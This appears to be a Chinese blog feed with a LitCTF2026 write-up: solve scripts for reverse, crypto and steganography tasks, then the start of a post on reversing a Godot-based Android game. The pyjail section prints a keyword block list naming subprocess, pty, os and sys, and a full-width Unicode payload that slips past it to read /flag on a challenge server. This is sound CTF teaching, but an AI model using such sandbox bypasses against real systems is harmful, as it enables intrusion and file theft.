<pre><code>import struct ct = bytes.fromhex( "edef21feb79b3cb0" "1e9372e2023e29bc" "36f70c922e5aae46" "44fa45251ae58c87" ) k0, k1, k2, k3 = 0xCAFEBABE, 0xDEADBEEF, 0xA11CEFAC, 0xB00B1E00 delta = 0x9E3779B9 M = 0xFFFFFFFF def decrypt_block(v0, v1): s = (32 * delta) &amp; M for _ in range(32): v1 = (v1 - ((((v0 &lt;&lt; 4) + k0) ^ (v0 + s) ^ ((v0 &gt;&gt; 5) + k1))) ) &amp; M v0 = (v0 - ((((v1 &lt;&lt; 4) + k2) ^ (v1 + s) ^ ((v1 &gt;&gt; 5) + k3))) ) &amp; M s = (s - delta) &amp; M return v0, v1 pt = b"" for i in range(0, len(ct), 8): v0, v1 = struct.unpack("&lt;II", ct[i:i+8]) p0, p1 = decrypt_block(v0, v1) pt += struct.pack("&lt;II", p0, p1) pad = pt[-1] print(pt[:-pad].decode()) </code></pre> <p>LitCTF{rev03_tea_standard!!}</p> <h2>lit_b64_alphabet</h2> <p>IDA打开程序,逻辑全在main函数,就是一个换了字母表的Base64</p> <p><img src="./images/img-48.png" alt="Figure 48" /></p> <p>每 3 字节 -&amp;gt; 24 bit -&amp;gt; 拆 4 段 6 bit -&amp;gt; 查表 <code>g\_alphabet</code></p> <ul> <li> <p>末尾不足 3 字节用 <code>=</code> 补齐</p> </li> <li> <p>编码结果与 <code>g\_expected</code> 直接 <code>strcmp</code></p> </li> </ul> <p>字母表</p> <pre><code>2KuEphj84USZF67iloxzfYd+MrDgRG9yLwBnHAXcJq3eCN/s1bOQ5TvPa0tVkWmI </code></pre> <p>密文比对加判断</p> <p><img src="./images/img-49.png" alt="Figure 49" /></p> <p>解题脚本</p> <pre><code>import base64 # 0x140012080: 自定义 Base64 字母表 CUSTOM_ALPHABET = "2KuEphj84USZF67iloxzfYd+MrDgRG9yLwBnHAXcJq3eCN/s1bOQ5TvPa0tVkWmI" # RFC 4648 标准 Base64 字母表 STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" # 0x140012040: 程序内嵌的期望密文 EXPECTED = "zjA5lToj9PUAGn2O+v6TRPosgYWB6noyGjhBgjfwyl==" def solve(ciphertext: str) -&gt; str: assert len(CUSTOM_ALPHABET) == 64 and len(set(CUSTOM_ALPHABET)) == 64 trans = str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET) mapped = ciphertext.translate(trans) return base64.b64decode(mapped).decode() if __name__ == "__main__": flag = solve(EXPECTED) print("[+] mapped :", EXPECTED.translate(str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET))) print("[+] flag :", flag) </code></pre> <p>LitCTF{rev02_custom_b64_table!}</p> <h2>lit_xor_chain</h2> <p>main函数如下:</p> <p><img src="./images/img-50.png" alt="Figure 50" /></p> <p>逻辑非常直白:</p> <ol> <li> <p>读入 30 字节字符串。</p> </li> <li> <p>对每个字节先 <code>xor 0x52</code>,再 <code>\+ 5</code>。</p> </li> <li> <p>与 <code>g\_expected</code> 数组逐字节比较。</p> </li> </ol> <p><img src="./images/img-51.png" alt="Figure 51" /></p> <p><strong>解题脚本</strong></p> <pre><code>expected = bytes([ 0x23, 0x40, 0x2B, 0x16, 0x0B, 0x19, 0x2E, 0x25, 0x3C, 0x29, 0x67, 0x68, 0x12, 0x2F, 0x42, 0x25, 0x12, 0x2B, 0x3F, 0x3C, 0x41, 0x12, 0x38, 0x3B, 0x3B, 0x12, 0x42, 0x3E, 0x78, 0x34, ]) flag = bytes(((b - 5) &amp; 0xFF) ^ 0x52 for b in expected) print(flag.decode()) </code></pre> <p>LitCTF{rev01_xor_then_add_ok!}</p> <h2>lit_xtea_tweak</h2> <p>输入先8字节对齐</p> <p><img src="./images/img-52.png" alt="Figure 52" /></p> <p>PKC#7风格填充</p> <p><img src="./images/img-53.png" alt="Figure 53" /></p> <p>明文长度32</p> <p><img src="./images/img-54.png" alt="Figure 54" /></p> <p>魔改的xtea算法</p> <ul> <li> <p>4 × 32-bit 子密钥 <code>g\_key</code></p> </li> <li> <p>64-bit 块,32 轮</p> </li> <li> <p>但常量 <code>delta</code> 被换成了 <code>0xDEADBEEF</code></p> <ul> <li> <p><code>559038737 == 0x21524111 == \-0xDEADBEEF \(mod 2^32\)</code>,所以 <code>i \-= 559038737</code> 即 <code>i \+= 0xDEADBEEF</code></p> </li> <li> <p>终止值 <code>\-709370400 == 0xD5C593E0 == \(0xDEADBEEF \* 32\) \&amp;amp; 0xFFFFFFFF</code></p> </li> </ul> </li> </ul> <p><img src="./images/img-55.png" alt="Figure 55" /></p> <p>用到的数据</p> <p><img src="./images/img-56.png" alt="Figure 56" /></p> <p>解题脚本</p> <pre><code>import struct CIPHER = bytes([ 0xE3, 0xEE, 0x1E, 0xE7, 0xD3, 0xA7, 0x96, 0x6F, 0xC6, 0xA7, 0xB9, 0xE1, 0xB9, 0x4E, 0x67, 0x86, 0x5F, 0x03, 0x04, 0xA6, 0xDB, 0xBB, 0xB9, 0x40, 0x56, 0x3A, 0xF7, 0x9E, 0xEE, 0x64, 0xD4, 0x06, ]) KEY = [0x11111111, 0x22222222, 0x33333333, 0x44444444] DELTA = 0xDEADBEEF ROUNDS = 32 MASK = 0xFFFFFFFF def xtea_decrypt_block(v0: int, v1: int, key, rounds=ROUNDS, delta=DELTA): s = (delta * rounds) &amp; MASK for _ in range(rounds): v1 = (v1 - ((((v0 &lt;&lt; 4) ^ (v0 &gt;&gt; 5)) + v0) &amp; MASK ^ (s + key[(s &gt;&gt; 11) &amp; 3]) &amp; MASK)) &amp; MASK s = (s - delta) &amp; MASK v0 = (v0 - ((((v1 &lt;&lt; 4) ^ (v1 &gt;&gt; 5)) + v1) &amp; MASK ^ (s + key[s &amp; 3]) &amp; MASK)) &amp; MASK return v0, v1 def main(): plain = b"" for i in range(0, len(CIPHER), 8): a, b = struct.unpack("&lt;II", CIPHER[i:i+8]) a, b = xtea_decrypt_block(a, b, KEY) plain += struct.pack("&lt;II", a, b) pad = plain[-1] if 1 &lt;= pad &lt;= 8 and plain.endswith(bytes([pad]) * pad): plain = plain[:-pad] print("flag:", plain.decode()) if __name__ == "__main__": main() </code></pre> <p>LitCTF{rev04_xtea_delta_twk!}</p> <h1>Crypto</h1> <h2>lit_xor_two_story</h2> <p>题目原件是一个py脚本</p> <pre><code>#!/usr/bin/env python3 """ LitCTF2026 — One-time pad reused for two messages (40 bytes each). Players receive output.txt and README; they do not receive secret.py. """ from __future__ import annotations import argparse import os from pathlib import Path try: from secret import M1_FLAG except ImportError: raise SystemExit( "secret.py (organizer) is required to generate ciphertext; " "players work from output.txt only." ) # Public second message — duplicated in README for contestants. M2_KNOWN = b"litctf2026_xor_keystream_reuse_40bytes!!" assert len(M1_FLAG) == len(M2_KNOWN) == 40 def xor_bytes(a: bytes, b: bytes) -&gt; bytes: return bytes(x ^ y for x, y in zip(a, b)) def main() -&gt; None: parser = argparse.ArgumentParser() parser.add_argument( "--write", type=Path, help="Write hex lines to file.", ) args = parser.parse_args() n = len(M1_FLAG) k = os.urandom(n) c1 = xor_bytes(M1_FLAG, k) c2 = xor_bytes(M2_KNOWN, k) lines = [ f"c1 = {c1.hex()}", f"c2 = {c2.hex()}", f"len = {n}", ] text = "\n".join(lines) + "\n" print(text, end="") if args.write: args.write.write_text(text, encoding="utf-8") if __name__ == "__main__": main() # c1 = 5f70a847ce12759e156e3cad1aa9530a119386a02ffc1c31bf14ab7a0a82ccc108f8476f75c98a28 # c2 = 5f70a847ce123cc153283ca710ae7f042b8490a238eb2228970fad6a2694f2985dc5557e69e5f474 # len = 40 </code></pre> <p>核心逻辑:</p> <pre><code>M2_KNOWN = b"litctf2026_xor_keystream_reuse_40bytes!!" # 40 字节,已公开 assert len(M1_FLAG) == len(M2_KNOWN) == 40 n = len(M1_FLAG) k = os.urandom(n) # 随机密钥 c1 = xor_bytes(M1_FLAG, k) # 加密 flag c2 = xor_bytes(M2_KNOWN, k) # 用同一把 k 加密公开消息 </code></pre> <p>输出:</p> <pre><code>c1 = 5f70a847ce12759e156e3cad1aa9530a119386a02ffc1c31bf14ab7a0a82ccc108f8476f75c98a28 c2 = 5f70a847ce123cc153283ca710ae7f042b8490a238eb2228970fad6a2694f2985dc5557e69e5f474 len = 40 </code></pre> <p>关键点:<strong>同一把一次性密钥 `k` 被用于两条消息</strong>,且其中一条 `M2` 完全已知。这是经典的 OTP key‑reuse(two‑time pad)漏洞。</p> <p><strong>求解脚本</strong></p> <pre><code>c1 = bytes.fromhex("5f70a847ce12759e156e3cad1aa9530a119386a02ffc1c31bf14ab7a0a82ccc108f8476f75c98a28") c2 = bytes.fromhex("5f70a847ce123cc153283ca710ae7f042b8490a238eb2228970fad6a2694f2985dc5557e69e5f474") m2 = b"litctf2026_xor_keystream_reuse_40bytes!!" flag = bytes(a ^ b ^ c for a, b, c in zip(c1, c2, m2)) print(flag.decode()) </code></pre> <p><img src="./images/img-57.png" alt="Figure 57" /></p> <p>litctf{otp_reuse_never_twice_same_key__}</p> <h2>lit_elgamal_handshake</h2> <p>题目原件</p> <pre><code>#!/usr/bin/env python3 """ LitCTF2026 — ElGamal handshake (story) Someone left debug logging on; the private exponent x was printed alongside ciphertext. """ from __future__ import annotations import argparse from pathlib import Path from random import randrange from Crypto.Util.number import bytes_to_long, getPrime, getRandomRange try: from secret import FLAG except ImportError as e: raise SystemExit("secret.py (FLAG) is required to encrypt.") from e def generate_elgamal_keypair(bits: int = 512) -&gt; tuple[int, int, int, int]: p = getPrime(bits) for _ in range(1000): g = getRandomRange(2, min(6, p - 1)) if pow(g, (p - 1) // 2, p) != 1: break else: raise RuntimeError("could not find suitable g") x = randrange(2, p - 1) y = pow(g, x, p) return p, g, y, x def main() -&gt; None: parser = argparse.ArgumentParser() parser.add_argument( "--write", type=Path, help="Write captured output to this file (for organizers).", ) args = parser.parse_args() p, g, y, x = generate_elgamal_keypair(bits=512) k = randrange(1, p - 2) m = bytes_to_long(FLAG) if m &gt;= p: raise ValueError("flag too large for chosen p — shorten FLAG") c1 = pow(g, k, p) c2 = (m * pow(y, k, p)) % p lines = [ "=== Public key (p, g, y) ===", f"p = {p}", f"g = {g}", f"y = {y}", "", "=== Ciphertext (c1, c2) ===", f"c1 = {c1}", f"c2 = {c2}", "", "# [DEBUG] prod accidentally logged the long-term secret:", f"x = {x}", ] text = "\n".join(lines) + "\n" print(text, end="") if args.write: args.write.write_text(text, encoding="utf-8") if __name__ == "__main__": main() # === Public key (p, g, y) === # p = 9000784855376359808051354825193962042770028561343848432778443672755982397391267124312572697249531643069409873722736348916207732622884411596948807031140651 # g = 3 # y = 269130883529708333054320571854006406481346665463416017026083074488011546059928157925990665431751017523964760326934454181952822744463714981243407307134357 # === Ciphertext (c1, c2) === # c1 = 5245857426274383693193378669425243235151460522527004924092730024427525619244222247576829782077334810173274945751493387545849499010408499951268967774043627 # c2 = 6059939492718262451327758167005534191200936922719178843825888167191062504030471358635203794720371216217447404436172970111033824674731063386612549785069654 # # [DEBUG] prod accidentally logged the long-term secret: # x = 633366293219022684108628483753423657477324253833657141033762971761747669344649667887002347907882241246119223126492863291886751205505360049793728851371884 </code></pre> <p>题目实现了一个标准的 ElGamal 加密方案,但在调试输出中&amp;#34;意外地&amp;#34;打印了长期私钥 <code>x</code>。</p> <h3><strong>公开参数</strong></h3> <pre><code>p = 9000784855376359808051354825193962042770028561343848432778443672755982397391267124312572697249531643069409873722736348916207732622884411596948807031140651 g = 3 y = 269130883529708333054320571854006406481346665463416017026083074488011546059928157925990665431751017523964760326934454181952822744463714981243407307134357 </code></pre> <h3><strong>密文</strong></h3> <pre><code>c1 = 5245857426274383693193378669425243235151460522527004924092730024427525619244222247576829782077334810173274945751493387545849499010408499951268967774043627 c2 = 6059939492718262451327758167005534191200936922719178843825888167191062504030471358635203794720371216217447404436172970111033824674731063386612549785069654 </code></pre> <h3><strong>泄漏的私钥</strong></h3> <pre><code>x = 633366293219022684108628483753423657477324253833657141033762971761747669344649667887002347907882241246119223126492863291886751205505360049793728851371884 </code></pre> <h3><strong>ElGamal 回顾</strong></h3> <p>加密过程:</p> <ul> <li> <p>选取随机数 <code>k</code></p> </li> <li> <p><code>c1 = g^k mod p</code></p> </li> <li> <p><code>c2 = m · y^k mod p</code>,其中 <code>y = g^x mod p</code></p> </li> </ul> <p>解密过程:</p> <ul> <li> <p>共享秘密 <code>s = c1^x mod p = g^\(kx\) mod p = y^k mod p</code></p> </li> <li> <p>明文 <code>m = c2 · s^\(\-1\) mod p</code></p> </li> </ul> <h3><strong>解题脚本</strong></h3> <pre><code>from Crypto.Util.number import long_to_bytes p = 9000784855376359808051354825193962042770028561343848432778443672755982397391267124312572697249531643069409873722736348916207732622884411596948807031140651 g = 3 y = 269130883529708333054320571854006406481346665463416017026083074488011546059928157925990665431751017523964760326934454181952822744463714981243407307134357 c1 = 5245857426274383693193378669425243235151460522527004924092730024427525619244222247576829782077334810173274945751493387545849499010408499951268967774043627 c2 = 6059939492718262451327758167005534191200936922719178843825888167191062504030471358635203794720371216217447404436172970111033824674731063386612549785069654 x = 633366293219022684108628483753423657477324253833657141033762971761747669344649667887002347907882241246119223126492863291886751205505360049793728851371884 s = pow(c1, x, p) m = (c2 * pow(s, -1, p)) % p print(long_to_bytes(m)) </code></pre> <p><img src="./images/img-58.png" alt="Figure 58" /></p> <p>litctf{elgamal_leak_makes_happy_decrypt}</p> <h2>lit_rsa_neighbor</h2> <p>题目原件</p> <pre><code>#!/usr/bin/env python3 """ LitCTF2026 — RSA where q is 'far' along the prime line but still close enough to p for Fermat. """ from __future__ import annotations import argparse from pathlib import Path import gmpy2 from Crypto.Util.number import bytes_to_long, getPrime try: from secret import FLAG, NEXT_PRIME_STEPS except ImportError as e: raise SystemExit( "secret.py is required to generate output (FLAG, NEXT_PRIME_STEPS)." ) from e E = 65537 def main() -&gt; None: parser = argparse.ArgumentParser() parser.add_argument( "--write", type=Path, help="Write n, c to this file.", ) args = parser.parse_args() p = getPrime(512) q = p for _ in range(NEXT_PRIME_STEPS): q = int(gmpy2.next_prime(q)) n = p * q m = bytes_to_long(FLAG) if m &gt;= n: raise ValueError("flag too large for n") c = pow(m, E, n) lines_players = [f"{n = }", f"{c = }", f"e = {E}"] text = "\n".join(lines_players) + "\n" print(text, end="") if args.write: args.write.write_text(text, encoding="utf-8") if __name__ == "__main__": main() # n = 139637440016232025690294457609899605991056011052010466558411851317943636600860419882966079629826706361935550982744312593243181819999590825159611186779613601241742349986440676188542381451066058816661317621009248513651083772907520139375108426466691332559612971244160246310746215067136490772061317571744230078911 # c = 81172369642931859390486697024961350889751244109623802937988620847486863147682579984823958801948701482096140632580173113959531836503723522945335985723867818778699337807630592078265626995722998378992215523352858561923474395550395284015986525513984910021995657780411466237306614109262460764382539311725297619429 # e = 65537 </code></pre> <p>题目源码核心逻辑:</p> <pre><code>p = getPrime(512) q = p for _ in range(NEXT_PRIME_STEPS): q = int(gmpy2.next_prime(q)) n = p * q c = pow(m, E, n) </code></pre> <p><code>q</code> 是从 <code>p</code> 开始连续调用 <code>next\_prime</code> 若干次得到的,因此 <code>p</code> 和 <code>q</code> 非常接近(只差几个素数间隙)。</p> <p>给定数据:</p> <pre><code>n = 139637440016232025690294457609899605991056011052010466558411851317943636600860419882966079629826706361935550982744312593243181819999590825159611186779613601241742349986440676188542381451066058816661317621009248513651083772907520139375108426466691332559612971244160246310746215067136490772061317571744230078911 c = 81172369642931859390486697024961350889751244109623802937988620847486863147682579984823958801948701482096140632580173113959531836503723522945335985723867818778699337807630592078265626995722998378992215523352858561923474395550395284015986525513984910021995657780411466237306614109262460764382539311725297619429 e = 65537 </code></pre> <p><strong>解题思路</strong></p> <p>当 `p` 和 `q` 很接近时,适用 <strong>Fermat 因式分解法</strong>:</p> <p>设 <code>n = p \* q</code>,令 <code>a = \(p \+ q\) / 2</code>,<code>b = \(q \- p\) / 2</code>,则:</p> <p>$n = a^2 - b^2$</p> <p>从 <code>a = ⌈√n⌉</code> 开始递增,每次检查 <code>a² \- n</code> 是否为完全平方数。当 <code>p</code> 和 <code>q</code> 接近时,<code>a</code> 离 <code>√n</code> 很近,迭代次数极少。</p> <p><strong>解题脚本</strong></p> <pre><code>#!/usr/bin/env python3 import gmpy2 from Crypto.Util.number import long_to_bytes n = 139637440016232025690294457609899605991056011052010466558411851317943636600860419882966079629826706361935550982744312593243181819999590825159611186779613601241742349986440676188542381451066058816661317621009248513651083772907520139375108426466691332559612971244160246310746215067136490772061317571744230078911 c = 81172369642931859390486697024961350889751244109623802937988620847486863147682579984823958801948701482096140632580173113959531836503723522945335985723867818778699337807630592078265626995722998378992215523352858561923474395550395284015986525513984910021995657780411466237306614109262460764382539311725297619429 e = 65537 # Fermat factorization a = gmpy2.isqrt(n) + 1 count = 0 while True: b2 = a * a - n if gmpy2.is_square(b2): b = gmpy2.isqrt(b2) p = int(a - b) q = int(a + b) print(f"Found after {count} iterations") print(f"p = {p}") print(f"q = {q}") break a += 1 count += 1 if count % 100000 == 0: print(f"iter {count}") assert p * q == n phi = (p - 1) * (q - 1) d = pow(e, -1, phi) m = pow(c, d, n) flag = long_to_bytes(int(m)) print(flag) </code></pre> <p><img src="./images/img-59.png" alt="Figure 59" /></p> <p>litctf{rsa_fermat_finds_close_primes}</p> <h2>lit_tiny_key_aes</h2> <p>题目原件</p> <pre><code>#!/usr/bin/env python3 """ LitCTF2026 — AES-128-ECB with a mostly fixed key (weak operational policy). """ from __future__ import annotations import argparse from pathlib import Path from Crypto.Cipher import AES from Crypto.Util.Padding import pad try: from secret import FLAG, UNKNOWN_KEY_SUFFIX except ImportError as e: raise SystemExit( "secret.py is required to generate ciphertext (contains FLAG and key suffix)." ) from e KEY_PREFIX = b"LitCTF2026!!!" # 13 bytes; 3 bytes brute-forced assert len(KEY_PREFIX) + len(UNKNOWN_KEY_SUFFIX) == 16 def encrypt_aes_ecb_pkcs7(plaintext: bytes, key: bytes) -&gt; bytes: cipher = AES.new(key, AES.MODE_ECB) return cipher.encrypt(pad(plaintext, AES.block_size)) def main() -&gt; None: parser = argparse.ArgumentParser() parser.add_argument( "--write", type=Path, help="Write ciphertext hex to this file.", ) args = parser.parse_args() key = KEY_PREFIX + UNKNOWN_KEY_SUFFIX c = encrypt_aes_ecb_pkcs7(FLAG, key) line = f"c = {c!r}\n" print(line, end="") if args.write: args.write.write_text(line, encoding="utf-8") if __name__ == "__main__": main() # c = b"\x0c\xdb'`\xc91\xf7\x05\x91+\x0fM\xed\xbc\x9b\xf1\xd8D\xcd\xfd\x0c\xb9\xb6\xb2J&lt;\x86\x19\x06K\xb3\xa2\xa4\x18\x87&lt;v\xac\x1bbu#\xaa\xb5I\x7f\xd8\xd3" </code></pre> <p><strong>题目分析</strong></p> <p>题目给出一份 AES-128-ECB 加密脚本和一段密文:</p> <pre><code>KEY_PREFIX = b"LitCTF2026!!!" # 13 bytes; 3 bytes brute-forced assert len(KEY_PREFIX) + len(UNKNOWN_KEY_SUFFIX) == 16 </code></pre> <p><strong>关键信息:</strong></p> <ul> <li> <p>AES-128 密钥共 16 字节</p> </li> <li> <p>前 13 字节是已知常量 <code>LitCTF2026\!\!\!</code></p> </li> <li> <p>后 3 字节随机未知(即 <code>UNKNOWN\_KEY\_SUFFIX</code>)</p> </li> <li> <p>注释里也写明 <code>3 bytes brute\-forced</code></p> </li> </ul> <p><strong>思路</strong></p> <p>未知部分仅 3 字节,搜索空间 256³ ≈ 1.6×10⁷,单机几十秒内即可枚举完。</p> <p>对每个候选 key 解密,再用两条筛选条件锁定真 key:</p> <ol> <li> <p>PKCS7 <code>unpad</code> 不抛异常(过滤掉绝大多数错误 key)</p> </li> <li> <p>解密结果全部是可打印 ASCII</p> </li> </ol> <p><strong>解题脚本</strong></p> <pre><code>#!/usr/bin/env python3 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad from itertools import product KEY_PREFIX = b"LitCTF2026!!!" c = b"\x0c\xdb'`\xc91\xf7\x05\x91+\x0fM\xed\xbc\x9b\xf1\xd8D\xcd\xfd" \ b"\x0c\xb9\xb6\xb2J&lt;\x86\x19\x06K\xb3\xa2\xa4\x18\x87&lt;" \ b"v\xac\x1bbu#\xaa\xb5I\x7f\xd8\xd3" for s in product(range(256), repeat=3): key = KEY_PREFIX + bytes(s) pt = AES.new(key, AES.MODE_ECB).decrypt(c) try: flag = unpad(pt, 16) except ValueError: continue if all(32 &lt;= b &lt; 127 for b in flag): print(f"suffix = {bytes(s)!r}") print(f"flag = {flag.decode()}") break </code></pre> <p><img src="./images/img-60.png" alt="Figure 60" /></p> <p>litctf{aes_tiny_brut3_for_the_win!}</p> <h1>Misc</h1> <h2>lit_lsb_base64</h2> <p>题目提示是LSB隐写,直接扔进随波逐流</p> <p><img src="./images/img-61.png" alt="Figure 61" /></p> <p>base64解码</p> <p><img src="./images/img-62.png" alt="Figure 62" /></p> <p>拿到flag</p> <pre><code>LitCTF{lsb_1s_fun_w1th_b4s3_64} </code></pre> <h2>lit_rush_qr</h2> <p>附件给了一个gif,我们可以用<a href="https://www.iloveimg.com/zh-cn/convert-to-jpg">iloveimg</a>这个网站把gif转为图片</p> <p><img src="./images/img-63.png" alt="Figure 63" /></p> <p>可以发现二维码缺少定位符,依旧随波逐流</p> <p><img src="./images/img-64.png" alt="Figure 64" /></p> <p>补全三个定位角之后即可识别</p> <p><img src="./images/img-65.png" alt="Figure 65" /></p> <p>得到</p> <pre><code>LitCTF{qr_h1gh_3rr_c0r_r3c0v3ry} </code></pre> <h2>lit_welcome</h2> <p>依旧拖进随波逐流</p> <p><img src="./images/img-66.png" alt="Figure 66" /></p> <p>lsb分析</p> <p><img src="./images/img-67.png" alt="Figure 67" /></p> <p>拿到flag</p> <pre><code>LitCTF{w3lc0m3_t0_m1sc_w0rld} </code></pre> <h2>lit_sstv</h2> <p>直接用在线网站解sstv</p> <p>https://sstv-decoder.mathieurenaud.fr/</p> <p><img src="./images/img-68.png" alt="Figure 68" /></p> <p>拿到flag</p> <pre><code>LitCTF{sstv_p4t13nc3} </code></pre> <h2>lit_pyjail_reader</h2> <p>题目原件</p> <pre><code>#!/usr/bin/env python3 """LitCTF — 入门 Pyjail:验证码 + 按指引两次只读文件(无 RCE)。""" import secrets import socket import string import threading HOST = "0.0.0.0" PORT = 9999 MAX_QUEUED = 64 MAX_LINE = 512 MAX_FILE = 4096 def recv_line(conn: socket.socket) -&gt; str: data = bytearray() while len(data) &lt; MAX_LINE: chunk = conn.recv(1) if not chunk: break if chunk == b"\n": break data += chunk return data.decode("utf-8", errors="replace").strip() def safe_read(path: str) -&gt; str: p = path.strip() if not p or p.startswith("-") or "\x00" in p: raise ValueError("invalid path") with open(p, "r", errors="replace") as f: return f.read(MAX_FILE) def handle(conn: socket.socket) -&gt; None: try: conn.settimeout(120) alphabet = string.ascii_uppercase challenge = "".join(secrets.choice(alphabet) for _ in range(8)) conn.sendall( f"Please enter the reverse of '{challenge}' to continue: ".encode() ) ans = recv_line(conn) if ans != challenge[::-1]: conn.sendall(b"Wrong reverse string. Bye.\n") return conn.sendall( b"Good.\n" b"Step 1: read /app/where_is_flag.txt (it contains the flag path).\n" b"Step 2: read that path.\n" b"File path (1/2): " ) p1 = recv_line(conn) try: c1 = safe_read(p1) except Exception as e: conn.sendall(f"Error: {e}\n".encode(errors="replace")) return conn.sendall(b"--- begin ---\n") conn.sendall(c1.encode(errors="replace")) conn.sendall(b"\n--- end ---\nFile path (2/2): ") p2 = recv_line(conn) try: c2 = safe_read(p2) except Exception as e: conn.sendall(f"Error: {e}\n".encode(errors="replace")) return conn.sendall(c2.encode(errors="replace")) conn.sendall(b"\n") finally: conn.close() def main() -&gt; None: srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) srv.bind((HOST, PORT)) srv.listen(MAX_QUEUED) while True: client, _ = srv.accept() threading.Thread(target=handle, args=(client,), daemon=True).start() if __name__ == "__main__": main() </code></pre> <p>对题目原件分析后</p> <p>整道题不需要任何绕过,<strong>完全按照服务器的 Step1 / Step2 顺序走</strong>即可。脚本主要负责:</p> <ol> <li> <p>接收 banner,正则提取 8 字母 challenge</p> </li> <li> <p>反转后送回</p> </li> <li> <p>发送 <code>/app/where\_is\_flag\.txt</code></p> </li> <li> <p>解析 <code>\-\-\- begin \-\-\- \.\.\. \-\-\- end \-\-\-</code> 之间的内容拿到真实路径</p> </li> <li> <p>把这个路径再发回去,收最后输出</p> </li> </ol> <p>经典的新手引导型交互题</p> <p>流程:</p> <p>反转验证码</p> <p>读取: /app/where_is_flag.txt</p> <p>得到真正 flag 路径</p> <p>第二次读取那个路径</p> <p>拿 flag</p> <p><img src="./images/img-69.png" alt="Figure 69" /></p> <pre><code>flag{sisx9chi-ciik-4cd-81xr-vcfrxt7frexgh} </code></pre> <h2>lit_pyjail_unicode</h2> <p>原件</p> <pre><code>#!/usr/bin/env python3 """LitCTF — Unicode 标识符绕过:过滤检查原始源码字符串,解释器仍接受全角等价标识符。""" import re import socket import threading HOST = "0.0.0.0" PORT = 9999 MAX_QUEUED = 64 MAX_LINE = 240 # 仅检查「你键入的文本」:ASCII 关键字用词边界,避免匹配到 important 等 BANNED = re.compile( r"\bimport\b|\bexec\b|\beval\b|\bopen\b|\bcompile\b|\bglobals\b|\blocals\b|__|" r"\bgetattr\b|\bsetattr\b|\bdelattr\b|\bvars\b|\bbreakpoint\b|\binput\b|" r"\bsubprocess\b|\bpty\b|os.|sys.|\bposix\b", re.IGNORECASE, ) def banned(raw: str) -&gt; bool: if "\\u" in raw or "\\U" in raw or "\\x" in raw: return True return BANNED.search(raw) is not None def handle(conn: socket.socket) -&gt; None: try: conn.settimeout(60) conn.sendall( b"=== LitCTF pyjail unicode ===\n" b"Send ONE line of Python. It will be eval() with full __builtins__.\n" b"ASCII blacklist applies to your *source text* (see attachment jail.py).\n" b"Goal: read /flag and get its str content.\n&gt; " ) raw = bytearray() while len(raw) &lt; MAX_LINE: ch = conn.recv(1) if not ch: break if ch == b"\n": break raw += ch line = raw.decode("utf-8", errors="replace").strip() if not line: conn.sendall(b"empty\n") return if banned(line): conn.sendall(b"disallowed pattern in source\n") return try: out = eval(line, {"__builtins__": __builtins__}) conn.sendall(repr(out).encode(errors="replace") + b"\n") except Exception as e: conn.sendall(f"{type(e).__name__}: {e}\n".encode(errors="replace")) finally: conn.close() def main() -&gt; None: srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) srv.bind((HOST, PORT)) srv.listen(MAX_QUEUED) while True: c, _ = srv.accept() threading.Thread(target=handle, args=(c,), daemon=True).start() if __name__ == "__main__": main() </code></pre> <p>题目给了一个 Python pyjail,并提示:</p> <pre><code>Send ONE line of Python. It will be eval() with full __builtins__. ASCII blacklist applies to your source text. Goal: read /flag </code></pre> <p>源码关键部分:</p> <pre><code>BANNED = re.compile( r"\bimport\b|\bexec\b|\beval\b|\bopen\b|..." ) if banned(line): conn.sendall(b"disallowed pattern in source\n") return out = eval(line, {"__builtins__": __builtins__}) </code></pre> <p>可以看到:</p> <ul> <li> <p>黑名单只检查「原始输入字符串」</p> </li> <li> <p>但 <code>eval\(\)</code> 使用完整 <code>builtins</code></p> </li> <li> <p>并没有真正删除 <code>open</code></p> </li> </ul> <p>题目名是 <strong>unicode</strong>,因此考虑 Unicode 标识符绕过。</p> <p>一句话总结</p> <p>黑名单看的是字节,解析器看的是 NFKC 归一化后的标识符——两者认知不一致就是这道题的洞。把 <code>open</code> 写成全角 <code>open</code>,正则一无所知,编译器照常解析为内置 <code>open</code>,eval 一行 <code>open\(\&amp;\#39;/flag\&amp;\#39;\)\.read\(\)</code> 收工。</p> <p>用全角字符绕过</p> <pre><code>import socket HOST = "challenge.cyclens.tech" PORT = 32326 s = socket.socket() s.connect((HOST, PORT)) print(s.recv(4096).decode()) payload = "open('/flag').read()\n" s.send(payload.encode()) print(s.recv(4096).decode()) s.close() </code></pre> <p><img src="./images/img-70.png" alt="Figure 70" /></p> 腾讯游戏安全大赛-安卓端https://blog-5w0.pages.dev/posts/tencent-game-security-android/https://blog-5w0.pages.dev/posts/tencent-game-security-android/腾讯游戏安全大赛安卓端复现记录Sun, 24 May 2026 00:00:00 GMT<h1>腾讯游戏安全大赛-安卓端</h1> <p>第一次见到apk里面的的Godot壳,记录一下</p> <p>先对apk进行分析,实际上在jadx中看不到游戏逻辑,java层基本没有赛题逻辑,主要是启动Godot</p> <p><img src="./images/img-01.png" alt="Image" /></p> <p>我们在buildconfig里面可以看到so加载的位置有一个是org.godotengine.godot</p> <p><img src="./images/img-02.png" alt="Image" /></p> <p>跳转过去,加载的so文件名是libgodot_android.so,但实际解包的so文件并不是这个</p> <p><img src="./images/img-03.png" alt="Image" /></p> <p>问AI,ai的回复是</p> <p>libsec2026.so 更像是 Godot GDExtension 插件形式</p> <pre><code>Java: System.loadLibrary("godot_android") ↓ Godot native engine 初始化 ↓ Godot 读取项目资源 / GDExtension 配置 ↓ native 层 dlopen/load libsec2026.so ↓ 调用 extension_init 注册扩展 ↓ 后续脚本或引擎调用 VMEntry / 注册方法 </code></pre> <p>解包后的assets,里面有游戏的主要逻辑脚本,但是都被加密了</p> <p>我们接下里只能去so层分析,找到加密逻辑</p> <pre><code>Java 层 System.loadLibrary("godot_android") ↓ libgodot_android.so 启动 Godot ↓ Godot 读 extension_list.cfg ↓ Godot 用内置解密逻辑/key 解密 sec2026.gdextension ↓ 解析 gdextension ↓ 再加载 libsec2026.so </code></pre> <p>分析libgodot_android.so加载解析逻辑</p> 